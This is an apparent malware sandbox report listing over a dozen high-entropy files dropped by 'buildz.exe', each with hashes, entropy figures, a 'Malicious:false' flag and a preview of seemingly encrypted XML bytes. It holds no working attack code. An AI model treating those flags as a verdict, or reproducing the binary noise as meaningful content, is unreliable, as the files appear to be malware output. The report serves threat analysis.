                        Preview:<?xml.....W....ew.~.>.h.0J.....Xp.@.c.GP^..w.U./....;.`...c=]S...&.FC....5a..G....VqN'.._.g."...........`..~=.*.)+o....J7.....;.Z..e../.G5..;..^../.y.].p*.4iZ"@.g/R.F.~.0..7..._.x.Y$.n....:.....]E......L.x.f....Nz..x.`(.....h..."..x.\,..5.e.4......2....Y.2..2I.m..*=C.aV.,.,3..../x.{R.j.A..{...'..2.8C...0..a....x...Bd.P8.Y.4...q...(......Q...a.K.$........G..Gb.C..r?<..N...d.]z....8..2.a8....j`....<..O.UM.!...BY...C..b...........$..F..w. ;5.39.[.`..J<..[.F..e.%....U.#.[..$fH...O..|.,]u..D..1,.n;.i.n5....MC`....x8c?y...v\_B...V.Xt(p....^&..b..~..e?^..{...y.|b...Jo.:..1cU......1..).?3..|.H............8.......t&pg.....t...O.7.Jd.....]..A..~#...U..R.....e....n....i....p8>0.t>........#L....^UIEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):853
                        Entropy (8bit):7.756634935401895
                        Encrypted:false
                        SSDEEP:24:82+SRUR9FosdGG2YYBQHJyL6114SfHvmQoH8GbD:8Zvosd928JyL6113f0H8UD
                        MD5:A53D933A9EF4514AF9368FB15DE5872C
                        SHA1:5EDB92AD48C45F5DD0FD5A7A8B278A035E7EDAF4
                        SHA-256:756CC9EEAF98AFFD8237281F8F588A75DBC1EBAE6861D6CC652AE21781EC012E
                        SHA-512:511A133AF067EEBB454E72BE312261C7C8FB63FE8660F4094A21057416E88FBF4EF468BD356DBC71FFE90CE726A8804D8D33AA2AA6C8018180414AE0B40075F3
                        Malicious:false
                        Preview:<?xml..F9..I....X#{.....j..;A.R.W?.Q.m.Ec!Mfkl......K.<..e.=..\4.z.o.?......LZY.s.c=..;[%........[.?6I0k.._...z...~u.O0JR6.P......OD.'.H..@>."Z...o..$..Bh....r*.%.. ..`Y..,......Zd..lr^.J.f\X..........v...;._..,H]..N..7...{GL.W....+...O......*.Q[Yt..ez....VU .....Q...Vz....S.0.!#.,G..Ia(...h..'[..d.C....p..n.^..!]l..Tf....V..6;'s.....'..w.D(.s.8n..[.X..I[....N..W....|..\...pR@i5.o.....\.S.U......N..k..;Q.vX.....d3i.}G..6..K..o.8..c..,...0...XyqL.A....P........,_..E*.SI....l..2o}5_K..~.....t[.......".....w......$uW.Yz..T..\.^....XI.5,..<.._.q.`.....B.6.d.)TP........~d...U*m.S..4 ......t.{....w.....R..3r...4..],.....s$uq/lY..q....f...43.........|~@. .....y..-AY52...8@.<m[.H~8.Kw..BF...._.W..D\..B.J.....Jh..}.....+"G#tQ....l.....B..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):912
                        Entropy (8bit):7.743265588751358
                        Encrypted:false
                        SSDEEP:12:wvoUTy349ft+4yxJ/u4sZ9mZN+j+sE7mD+sO3rNA0bpl9WIZpi85P6s826Gcii9a:Fcy3QM4ZjZYN+CsssArq0bpvDZUaAGbD
                        MD5:CA1B333BB347A3057EFF46E835DE16F7
                        SHA1:EBF5F03E60021E1EF918C1AAB01E44903109EB15
                        SHA-256:E92CEC6F5E9CCEF1BF76461C1DF593937753B0D92C5130ADBB93EACBD1295071
                        SHA-512:51434A0D9CEED069D002A4E8BA446EBEE806AE2469B98ACA919062E30E61DD84A3AE81ECF5471FAAB8CFD25A5F4ED9BBB5F6AAC0DC9B351E9EB6E767383AEB78
                        Malicious:false
                        Preview:<?xml.4...9...u.dyGM.+...6..J.....Ae... -..R......#x....et.]..v.x>aA....G..)jmE.[N....y.Hu#...PZXM'Y).......E.?A..pd...*....e4%.H..H.]*...w2C..P.O..l..Be....@.@....+..W......h....@T-p.b..p.K.....'...vZ..y..2.\..d...vQ'}....n.1.U[`biG..x.....U.X..>^.......[..U...GG....s[..bJ}.)..M.%.F...K..W....k~.X....6.{.&.J..},................%...@GF..... .!pB.=$..qDr........w...ap.z.,.+|..@.K..5.........-..6&...ash...Gg..P{."...}p.......A.A2.....Re.....D.........p.T..F....t..*3...q(...otc.d.oZB...=.9.P.....V...T[.CU..&..H.O.].ic..vDy...s.....r..c........lbk.q..=0.0E...*..1.NaL.S.%..$...K:|j....P.I..c).1J.MR.yt.|.>..^K....H.........3.....\9..KO...-..F.....S../.Q.].2T.n.7$6...B.5=...-...0..]Bc..yo..^...\ieX.......9.".<2Zu....Sp....~..]C?.Q".h..Ts?Wh.].b...\!f.....}g.;..{.N.~.X2.s..%......'.y.f1EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3310
                        Entropy (8bit):7.942847565776726
                        Encrypted:false
                        SSDEEP:48:P25jYsUElXarHh6Zxl5LRocpYILBK3cNj79gP+2rivv8Av9UgNVHRxCDwG8fJhsA:P2D/OB+9o1QBK3cNBgP+2cRxA8fJhsA
                        MD5:4B01E729F82946B0FD0F19744877FDF5
                        SHA1:9B9C3789B5A7B3FE10051BC32E7FB252E756C6DE
                        SHA-256:9C0FC6CAE5E8ECACB0B0ACA35C0DF1D851667330B491B47294BBB68303ABBA91
                        SHA-512:214AEE1B92645DDDB54CDC75AE930F416549895C6509535593C74CCE6E2FBCBE5AF5C968E61FC35BDBDE305690A64B08CD3E09D44F1C95D75E0B99F04D3DD59F
                        Malicious:false
                        Preview:<?xml.......D.J.y1._....chZ.F..ze..X.B....]6I.....>o<.1h.r..T.#.....tI5,J......\.........!.....R+z{.K...P.p.]...Y.PO.........GAb..pKi.../$|.dji#>K.mc.....#z....h.:...;h_.....^6.ro..t;j.....(*N.....g...R..........j.&o.<6.|.,%N..5...0\dme..V..!..h......Ka...&.)...Y`.,...i.3a..{.O.l....}...........xw.na.i..(I.t...Iux...P.$9.3...-..e).....1?[<P.v...o..S...v. .4.}l.3aM.5P.ht..5..5.A.?..._....Q^V.N...3....|...-.#....T..4..3....&Q..,...{..+V......#...!....D..P..R..E...D...[........4...1.8....v(.......q....U.a.B|^.....; .K...g.G...q.8._.*.......s4....x....>..._.....b.?.<..Q...6qZ.\..@I(..u..`k.........%c&.Ior..Eg'_.....Z......o8$...r5A.. .<..7.F.:..b...i.\.34..2....{b9..,8g....E..i.w...w..?.H..L...._J.f.v.)......C..*ha..+.....'iN..c...w..y......-9....M.i.~.x.6)5..*.+.%..~]g.|"FR.2 .c....V^Q_...R..~.~.2.(X4.".....[k.r.6t....[...H.w(W<c...\6.`....?..s...$f..K.!..l.LO2.t...g.y.Q.7...Q-wm.{....H....92.M;K.n..^Ys....K`.t!.6..\Q56.`c...W.1."....B.d=."..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):910
                        Entropy (8bit):7.777365331409025
                        Encrypted:false
                        SSDEEP:24:eUt0LY7BBANv6yA22SdvWBEmRz3Aa61wlaHGbD:eUf7BBANv9Pq3RzAaK8aHUD
                        MD5:8F39B90F94F7DEC90707FE9E44D5201A
                        SHA1:B394A03BCAB7F95F201A2ED6086AA60EE5B9E016
                        SHA-256:95E2AF8D3CC4BB8A6EF76EFBC64658317B073DDD34752DC5C3BC077F248E19E1
                        SHA-512:23A9CC37619200DCF59A7FE21451E0F6CA022C33577CF9A78A12D6A40A5D71FB506EB4D4DF4D3929128642D51232C6229F5902C748669ECF86FC1294FD60FCB3
                        Malicious:false
                        Preview:<?xmlo....&../..A..S)..9M......@.Lo.W.....5...tdV..\..5.B.......,............r9P...0._k.......%..r...]0...*.;./...~..W...|."6'..."oX.2.k...g.p.{ph.".....^#..~.H.;w.P.......L.p..........c.h.n.>..S.m...r...W..+."xQ{S`.Z6.=.X..fO..(..._.1=..O".V.@...5..?.lD&US.$xo...u..&\..e..\i.q......Y...{6.\./.}..B.....'.'Tn.<..Z......Bh.uM...!W.arV........".C..e.O...a1<q..h)]I.'q........[A!.s*.T..p...J?.....'.=.......6=....<.!X.c.Q..H......OK...o;Dq.?..........z..g.6K..o....b../s.o..<_=Q.Hn{a....l;..93)......Di/.......o]vj..M.=....#....:.D..e.6L.....?..h....,-$.@rmVpG\...4.B.;.7..C)w...l.......3.2..U~.~.....T..>..`......5Z...Uh.O..}.i..d.....7..SB...t81-lj$+...e-M...I.U.....`e...H..tU..}.......q.....?O.. ...'U....I.3|T..G.....o..........T..Kb.....Kv.m..t...e.....[)zC.D9.Ld.'.Mq...U,.).<..9.}..M.$.zEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):941
                        Entropy (8bit):7.7835700122459475
                        Encrypted:false
                        SSDEEP:24:+e7Hm4svPALiZgPTMWzDdBthoF8azs/kDlqHV2CPuuZYEGbD:+KiPAOZg1DzfoFe1HWuZjUD
                        MD5:567B39081B67DD48B96240E865C65927
                        SHA1:56C3311356675B53D7AAE86ABC401FFDBCB362CE
                        SHA-256:2C5762F019CD3086BC641BF2EC6543EF071A662C767E8CB19BAD285F89B81506
                        SHA-512:483C1061038CFA4A42FC709883D68BF6FC7542CCC041E256372EB768EA02B6912415F747EB6716FF089547D075D40358D2E0FA4E173724132D8DAE0AB256CB77
                        Malicious:false
                        Preview:<?xml_gh>........Z...-......Q.`.#.j.q.V....h]Y1.C...M.Oe..O./....f..7...k.x..N.RL........O.A...s...e.5.reG..ok..).j.r==.7.7..^..E..sD8...!......J...$.`....b1........r..:....v....@y.JA.....r.GRX...o.7..\;=."....\.0.m]..@z......7......E?.g=b..m.$.|G.Sa.i..dwt..G.U....Q....3...k../.w...O..>R..^.n..bY..E2.-2....3.9......!{C...[.C.8.I.d...H...;.ZA..W...j.....".;.h@V....._.]0..).5...)5WI.Q.u.K......(.G..s.[..u..j....+&.D..>.i..v..-e..T.........x...8.0.S:..E....%A.(....K}.{uw..#.5`..!".&..F5..G..BL..v............i.Si..s.~./...A..7.....gX.'.V.z.v'.me...'....:5..r......mr.U...y0..R.yv.aL.A..K.-e;.uN..au{....H....7.... 4.v.."b,eF|v.yn...........D....H_.UM8...R.gp.J.<..@+.......T.|.5A........s.-.........Y?.e2.I..>.....qP......&$.n..$......."i...k..0.2..Si....a.....7......n.m.0Z..b..v.I%Z[....Ws.<......S...A.6.a1EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):787
                        Entropy (8bit):7.7439736466573805
                        Encrypted:false
                        SSDEEP:12:hc6AkU4WkN4+uSeyBOCcpKla3VA+HJVDbnDsmVbXCZFCBHJxIfuUud26Gcii9a:aLkN4+9eyBAyutVD7IubUKpxQuhGbD
                        MD5:3E13C4301B1846C3FCFB89CA45E114C5
                        SHA1:1A918279406079579D053DEF54E4450CE590C73F
                        SHA-256:10D305FDEE6961F32C90F0EAC8DB52DAF9973E247D36B6A2B91CE5B807B54132
                        SHA-512:8CF14F757838D505BD737BE65706C13CC1915A6E438B9CCB5F690899527078C253862EFE1268D48F4EF47BCD5EE6A22492E8925029B3DAA61561064C384CC9E9
                        Malicious:false
                        Preview:<?xml.S..../..{G......_...}^...r7`...l..B..).......$F...[..p.5.Z...5B-..,..4...no.K...B.....Z.id..6..y3.C.....79T.<K.}#.Q..w....}tgv..3!<e.._Vf.ylvkt_t...<s..]m......1..e4Q.Z..0.(..+...K....c..Y....*.t.;...b.F.........L..4..a GW].....PeK6.P.9C...Xs..OI..v...w....0....u.jy.N..i..6.y>m.j..`.l..n.a3.....U..[../..~..JB(W.c..q./|.1J..62.rY.-.E|.wx..I..tT........./WL.......P.A.......V.?.:5.8Az.g.2)T\..;W..K..[.YF.[.X.g...q..(..+..~:.jk..`._.Ne...%.H.........>@..i...6=N..'.*........[K=x|{...'x.Htd.b..FD.3;O..ra/BfC.....a..8...&u.p...z.. t]8.j...K...........+.&`..r..Ix,V.D....@.o-.>E.+7...c.S..F..fNT?-.NQ.}..W...J........Q-.....V..s...|{..o.AH.v.R.].|.Y..p.j.s.YV....}k.....(...h...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):961
                        Entropy (8bit):7.7589845289457156
                        Encrypted:false
                        SSDEEP:24:thXPqVzRGL431FofbopxI55KvBtOgEkRXDIlkGbD:th/B4zofbwxInK/pRTI6UD
                        MD5:3D75A48791B8D84CCFAF27FA620D97CC
                        SHA1:AD7CD756FBACB54A79AC49857F22E5A2E99E0B41
                        SHA-256:DE68435896272E6FEDE68F5610252AA3B14EC444651A7B3D49383D42FC833614
                        SHA-512:BA7C72B85931290D920744A2E026A765370763545A84D9D08211477FCCEF69C54E4A49BE95AD7575A7B993F69F4B10AB646CA6B8B439DC7A90CEB7F0537823CE
                        Malicious:false
                        Preview:<?xml.i.F.RO.. .@.".f.g%....]...~....S.h..b..+.]H{mH.....E........9N.....U&.........L.K.J..'..*.K....S6ib3.......,.U.W.N8.50..s,.~%'.A..Vx0-x.B5...*. .?..[3..2.%]...<...1)..(.C.....-...!/......$..k"..k.....W21.~1...}*...w.6..0.*.?...Hy.)uy..i.xJ...N0DT..IT....R....w...T.6......l...(^.C..3z`.r.B..!.D..A....]".x.}...$PR8j...O..*.+....S....k.m.....&...o....y.}v.......[.J.7.....GM..A..{yg..v...F@..4&...^o..K^.q.. .B.VpV..f.o.c/......8.i^d..`.|#......Z~'.>}.q...D...&./1. ..........'.....a..O.B..WJ.p..G..!...(..g...r......&.Ap2.*.Q......8...>.-.~........y7.|%.V/.2....2._`.......H(.....UL.Me.S#.j]E.....ijW=.n..../.|.r..../e......?....A......G.....x.....E...&Z..0tZ......{...hP..L...x]oRJ\..B.4...<.x...5.~...s..e.E.b,.7J....d...V......o...N+..$...c...F..k.....I.r....gP....}."..H..^D..%..+.0...w...}...}....u{.Y6.....?..4N...(N..<}&..7K.~K.W]...2.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1131
                        Entropy (8bit):7.7938218036992195
                        Encrypted:false
                        SSDEEP:24:xSq0L8pgELm9/AP3dnEMrGSkx6/L0uWY+3MO0wHGbD:xSqw87mOVEME6/L0eEMOjUD
                        MD5:8FFB7AE8490CE02D2282DEA26B23A1EA
                        SHA1:14B6F57D6A6B3F1DB12A7290760BBB9589A60A42
                        SHA-256:469D3A573DA87A311101EAF7A3469EB81E1650F97333BCD522E89698DDA1708F
                        SHA-512:47A230B9F545B1C917BD281126B550A422D6EE49C597DCB68EA4F37121A608AE4E55FB250094FCD0EA1521B1897CB4677D5BBCCE4E915F73C06F20947C4AEF75
                        Malicious:false
                        Preview:<?xmlY..tK.......$tK..E...hp.{".D...._.s..`.>....0...9..uT"`....e.F.:..V0j......&.3[.{<...3.Hs.y.`.U.%_...../..W.~....9.7.....`......ch&...6.x..UWF(.5.U.H.....bQ..$..?..L:Su....VY.?.W../..30.[....%....`Mm.1P2X7IR.]7j....>..^..s..+.i.}..<....Y.d.Z.G..[.}...{G.yF>.Ss}.._.V...]T..\?.1!m.\...)..&k5.k.G>.i.....e.u9.8....m7.p.'...%{(.F.`....K.......J.9..u.....r.O..Z..Q..`.|..S~.......X..\..E...H... .5......4;k#.f..,^.g.......i2/.+..H..H..y...m...Eq..6.n.t.AO...*JV..J...>K....^.A..>......z....{Y......Q..0.%.>6I..2)VeX..[...g.|...V.P.j....TQ...b6...Y....U..D.n|.8M.1`........D...."..Z............N...%w..W.0.'.9.W..n@.k..'rc. 3(.i...... r..+....Q,[..?..kN.7}.~.xd........^..5w..o..f..0..s..2i..s..p......r..Z.x....;....=.;A..6.^Af...A.......4r..m.}.6.<......).e...:).S. ..o....y......!A1gB.(...^.d$..9...umP....VDcL...]..^=.#.hf..>....D9.m....X....?..{..0#D.p.d.......9......Eq....BJ9..203..0.R3./V....................7Kg.>^.=_.A.Q...r`'>FO.^.......,;...r)J
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):987
                        Entropy (8bit):7.758017187293638
                        Encrypted:false
                        SSDEEP:24:ePaKwvtbskDwcTXz282JtSzNTlJXeiCw3dEwoMZRRGbD:ePubsoBTXigzNpJXeiCw3XoMXRUD
                        MD5:0FEF5EC4B0C2FADA0E84EE373E3568FD
                        SHA1:8D43B9B7E85B5168A5500456F1DA2B71EEDA4B9D
                        SHA-256:6AC7A601742BD5D04D49A229BBBA597754441AF7BA98C99B4E18813D1C5AB1B4
                        SHA-512:036279593B2CFF97E46B85CF37F684CCEB2277E488390FE4B19625EA8022692E68E480BF624256D28A2EA797044137B2E2EA66CF5634E513CFD115E73C7298A9
                        Malicious:false
                        Preview:<?xml./J.)...)..}21....*Zb.."....5#?.v..o.ZuP[;..E../..g..;....m.a..g5VL..M.[. ...!.[k.-$...8...R..<.......).6N...f7rZ..$..CJ...x<.E....Q..D..E........[dp..oFdbV.;T.?...a..v.\Z..........?.I..H.ON....5o.9.....m.....9...Y..q3~.-.}./.F..3H.$............/m[.j@.....G?.E.."q..n#. ....T.9P....u...c..L..>..l.e.....sd..6H..P.vEg..6.<.z._...b..5*J9....k.}.^#...#.#.%U...;m8_...c....r.bX^..Rt......=...j.C.....@V....^..f..W...#Up.....A.&r..2..Z~N......2d.%..1%..o@Y........+....#...+O...n.q~.J"...CV.7q[kx..-.Q09.F..C..N...V.........8`.Ew.G..G.N....%.P]....~.._T.}..|.>.:..Vp.}C..5D..C..F0..7...7.L@.S.L..}. ./vW...W.cK.9V..`e...*..........x.[~.4..A..'..p>B\.Uu>^.....WJ:..._..xxCgBY.W....5b..... `|...+K..s..vI..f......=...&s}.....\g.......a0..`../.....}8.T.MG}.UR....+G.,c.Y.$u..T-.`/t.O...O.1]..sl..XJ...ga.hm.GK.....pA....o.5..+f0.xt.t(....a.N...?..."..Fb.jYS.R.u..`}P.....]EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):857
                        Entropy (8bit):7.739213942300772
                        Encrypted:false
                        SSDEEP:24:O0fBqGwa6X50CyNNWlCyHKnKEMBgwRGGbD:lPwatDjW3uKEkiUD
                        MD5:824377E889243E61E77567E93C0A9B95
                        SHA1:95EBB435CAA9E03FFDE2F7E04D132C09F0A8CEB1
                        SHA-256:0837B902BDFCEE750C575068D4A9F4A99D2689D9A837D5461C2C1D7C03E385FC
                        SHA-512:B1463320132567EC16AD53C4D71786691DCA558D60379D447CAE462951F90AE489A3835FA1B8B70FC84AD531B5B6F62DE46DEAB2E7DBB5A001AF2D111FA35A48
                        Malicious:false
                        Preview:<?xml..`...a.iS.....i3....7. .k..;..}.....|....2.1.h_.6 p..T+......{pQ.R..L.y(f...~.|......j_.(M%..........v.JB9aSV51NM.U.(./&.od...]Vg<......y......(..@...z..+.:.../3a...w.~.r..[.Av..A...8.....6....O......@....NS...l.\...i..3.i........E....14..FP.YW...'.....5.!.I.P..+..._E...]U....?...0.Q.....L..?.."5P..W.hY....*+f.7J..V&..(*..[..d..bI.\}@.K&.......D.lPl.`.\&/..i.... ....u~...q}.G..E...O.g"..."E1....n.a.gYBHm...j]........E2v=....N.Z,n..q..(.Db.+.o.XIh..x.m..])......[{..%......`...._6....g..h.B...= :.(&.{......$.!.}5.k..^...P8?}.3.QT.\..>.n=..rKrpr.w..P+u..fz4E..O....gQ..8............6Z..V)o.......,....E.^.._.&.g....3U7#...{..v..,...+B.z6...L+....'.6.f...N..(.i!2.;..r....9.F.F0l......(M%uk{%.c..(Wz.(.....&.-.u...z.....02.9......B#..}.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):859
                        Entropy (8bit):7.747979949857894
                        Encrypted:false
                        SSDEEP:24:X2oRTCtvHwQ8Eg/zxTnt27AEZtHy8N+EvGbD:3RoQQrg/zxAjZNnUD
                        MD5:BB9EF628E6749C5BEEFC0213EEEDBA86
                        SHA1:A8421E65A446D3436FB63C473F99A659559CBA04
                        SHA-256:BB75B5F8E0B2AF8A50CD5EB82E086FC9D53D8FC746B5882708E8B17E0667C863
                        SHA-512:DA5315560902626A0A6F2C9BA33091C39D2BA046A4282A23A358146ACF2C8F7422A1E8A2D243173A3076DCBA181BA0CB9F4789C214ADB706F3816296BD4426AD
                        Malicious:false
                        Preview:<?xml.,....?..`.e...L*{..r...0....j.T.....~.K(. .<g&U..H.cQn..m..]...m.....A.k..N.#...?..-Y.J..D..,?...^M.2V..D_....].".$.C?\..=..{|.!p.4....{.U9'..k...+kf..s..^.@.i..)..p...8o..bt....:.x..k{.m.;5..L3....6F.......{K.b.Z.0ic.W.f$.).ca.......e..0.a..Cj..b..h.5...Dg../...a.(FKT.........S..HV......,3.S..yo..6.|......A.v.a\..I...|v.',.h..|MI.......O.4.)..$.....x+..G..Z./.W..o...2..vyv.E.u`n..1x<....:.Lg..+Iu9..7..6.i6a.p./..uv...j...)g.^>P<}.....|...5.E%..=.s...Zi....3caB.^m....;k..}. i. ......n@...x._.-..%.I[....F....".>.....V..O..1./lNe,....R.1.%....9+..Kz)............A..p...1.zI....r..\.k{...).].s...{.&..s..K..[....P..E./.h.....j...g7.f........j F....l%.HO+m.......{.|M.rC.I../m/`:..B..P..%c.R%.g....E..m..............2q.U(^#......8a..)YEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):725
                        Entropy (8bit):7.702607918185763
                        Encrypted:false
                        SSDEEP:12:9hKpra2LdwqeHMrxzM6p7nDRCBHnoUBHzyh0sgJFBdWs20CTEFMAws26Gcii9a:9hKpFhwv1abDeHLBHp5lMeGbD
                        MD5:CDEA2E60619C55D1876AD2754A8DDEE9
                        SHA1:6AA90579E60E31DEA8E25BF7EE81EF588BA71036
                        SHA-256:3DBB655E1F4FCEA6FF783FBDE599BA94F8494E2F1E9C8739C781F9487E772327
                        SHA-512:A19CD3DF6848DCEE768429B74F3613E7306D3F65940D155C09E6212C0FFE51C4B4C49785C7734C682D7F3318F6CDAA8EAF64F715348B840435F2258E06354F88
                        Malicious:false
                        Preview:<?xml..._t..X.ZR..V.{.-o' .!..P......J..J............{Y..DAw...}.n./_#z.?.N..^..?f.RZ...%..&u...IcZ.@1..Y...!.A....F.YE..*=.O...:...9....$#.....M.i=.(trt..o.....h.z..*...^btD}......'>B....#.^..^hP..<f..%C....1...../Gp...1....&gG.....0.^.....9Vc...}~.*3@.....c.{....KW...13.f.RQI...qa....#.]N<.?.......g\R}....P.I$....Df.W.Y..j~...h.omd....#..q....i9..1.1............T2.{(y0..M......,}...V.1..Q....}:.k.I......X..1].Y..... .....b.h...fD...[k/..Y.......]..G~.0:&.\L.'Cp.;.......|).`....U.NQZ.j.....x ...........{.|.,...=...}..F.#".k..F.L'.$.".p...I2..w..9.;v.$.S.e.e..[I....~.`vQh..rB8..g.u.6..?..Lu.8.(.@..'.h.2.rEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1175
                        Entropy (8bit):7.815415781273711
                        Encrypted:false
                        SSDEEP:24:oPOMEdU7dhEsDEH97CD35u2NlWA9OSE/SH8sKmiHiyX7lnbYKvjEXKHLyF+HGbD:PME27dXEd7KnVE/M8s7mWK46r1UD
                        MD5:DCA689A23DF18CF2944B1C574A422445
                        SHA1:974EC0547DFCE74CCD019C7043F13757C63FD7AF
                        SHA-256:B2B4C5B04264B7B5AC42CC9DB36AEED9FC705BD89FAF86B87BC5D6BD0AACF0EE
                        SHA-512:AC436AD2733C41BD1F8212115CA174938729ABD9097161CE24FF63C20F141C11CF47E7F0D8C747D7BB19945F4522F60956248B8BAC4476D3E0C471DDED6C58BF
                        Malicious:false
                        Preview:<?xmlW.$.1...^...32....8&..`.v'W.`+'.....O6..hy.h..Du..Iml...n.d ..T..s.3......S.,.....U..%.:d.l....Q..V.FI.*....n......n.k....D{.td.f..,j.`....&..}.{4..E..........jV.].4$'....n...w.....yg.m@..b.z.-.Z...._.{.M.{9FC.{.W.S...6..M..5..rC..S.7.*...FG...$>.$........S.R~Qn..j.>Me..x.(X.$...^k..y^.....f.D*@r..).:.a.2..!.'.}...n/...x...*._#.........y).E...2....3jI..G6.-e.RM. ..{.r....3.e.J ...^r.....%.o.I*...L8.j..0..1ZH..m......O..?M.)j...|.#.=r...;..7(-.}H....l.3..Qy..v....e`1]a.G.\.F...fNE.2.k.L..1....4:.....s..y..H-<.T.6'.\%..u...<JZ.Ks.B.Rpo...27..!D+.|....2.....Yn.U.K4....w....w..[.6.'+.:s'.0..p.........Y2..........h..9..6w.U....%.&.s.......C..Vu(...*x].T.......y&O..t....?W...2.G;.)..7G.D..........%....D.=6.?.E].B.o.9't.rw...k..!...cmw....C...4......G6......yP.8.2........wpUI.T.:..........c....BU.....QI..j.....J..;...J.....r.......p.....~0.\.Z..x..M..........=....}.)a;..%..}..........6<..5....1.m...H.....w..i..$.I..iYdH...q?^.<'B..j~oL...7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):724
                        Entropy (8bit):7.661301833988827
                        Encrypted:false
                        SSDEEP:12:mNofhiBGuqZlxFpidO8075TFKnNdz694IU7ATUKD2lFKGef+2obC1Bn26Gcii9a:mNoEtwLYdd05FwpP4UiLB/obC1BfGbD
                        MD5:BE333F3A0EF85E833F1A150943432B80
                        SHA1:821CFFA9C03650D32BBE22F3B6D6A9D408A3E78F
                        SHA-256:499B36E4B5CF0B0420049922CF6D6B4E74004AB6B7E49A81DDB97AC6A2FDB690
                        SHA-512:3A21C1771E21C2E9F224310654458AB5B8035EE6722959993F816A0BBA7A37C0092EF0AE684217AE5D4E06B622F46FEDC935E12B269D91FDC2DC69453AEF7477
                        Malicious:false
                        Preview:<?xml.+0h.{.B3..)..X..rS.W....$R...4S.........sX....U{.;0.L..<6.&S.?....eZ!.../..<.\q.*`.];....W.`*.'-....X....C...,......r"...t...s....SOH.(*....s<..I.......cZ..vK.m}....d._.0q.xM.G...@5@.....f.|.C2u.....M,....n.p.....s~l}..r.q.N..Q.N.3../S........D_.....E'<.S....M......0~u....JhK.WL....%ns...Cs]/........?.pz.3q.m*..FZy.oF.l.|z.T.#EhA..c'8..............d.@..j..54J....Kdcs..1..;G.-..alo..q{.r.f.E..i....D.UJtr'..SCr.^..8Z.!M31(!.."&)...g8_3...`.....rgI..q>.%.Eh.C.U.P.#...gv..!E."..O...tu1)+B.F.9^....W.+..O.%.g%(Vu...}Y....I...fo..I.x$.'..r).B....Lji=.T.s..@..K$y.x..x..v.............L....../&...o..L.}.ZU?....TT.F.<..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):746
                        Entropy (8bit):7.644173992227218
                        Encrypted:false
                        SSDEEP:12:Ruqf2EXGmF3y2tfF8Y7XHZyr9b36fuPWmTtbLxbApKfxXvTb26Gcii9a:08GWftfFP7X5y13efktbFKQBzGbD
                        MD5:2FE794997A47A8D939887C0FB51FAB02
                        SHA1:A1A98CE658C12ABA75A27E97388BC7F0F16610CA
                        SHA-256:DF612BE34C4E794A23A2D7FA00B878E3DFAD00A325110A5588A49F9DF120FA2D
                        SHA-512:C6AA70EAF4BE1AD3306AAA9EDE4AC51965E3CD1E29845023722AD8DAF67C756D983E0C7948D50A2DC31E3825B9B56B107352E077427C56DE83365667573D06BE
                        Malicious:false
